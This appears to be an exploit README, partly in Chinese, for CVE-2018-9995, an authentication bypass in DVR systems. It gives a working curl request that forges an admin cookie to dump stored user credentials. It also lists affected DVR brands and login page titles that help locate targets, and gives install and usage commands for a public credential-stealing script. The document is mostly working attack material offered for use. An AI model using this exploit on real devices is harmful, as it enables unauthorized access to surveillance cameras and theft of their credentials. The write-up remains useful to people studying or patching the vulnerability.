[*] Exploit Title: "获取DVR凭证"
[*] CVE: CVE-2018-9995
[*] CVSS 基础得分 v3: 7.3 / 10
[*] CVSS 向量字符串: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
[*] 日期: 2018年4月9日
[*] 漏洞利用作者: Fernandez Ezequiel (推特:@capitan_alfa)

$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
Novo
CeNova
QSee
Pulnix
XVR 5 in 1 (标题: "XVR Login")
Securus, - 安全至上,永不妥协 !! -
Night OWL
DVR Login
HVR Login
MDVR Login



usr@pwn:~$ git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git
usr@pwn:~$ cd CVE-2018-9995_dvr_credentials
usr@pwn:~$ pip install -r requirements.txt
usage: getDVR_Credentials.py [-h] [-v] --host HOST [--port PORT]
[+] 获取暴露的凭证
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--host HOST Host
--port PORT Port
[+] 演示: python getDVR_Credentials.py --host 192.168.1.101 -p 81

http://misteralfa-hack.blogspot.cl/2018/04/update-dvr-login-bypass-cve-2018-9995.html
我看到你了...!xd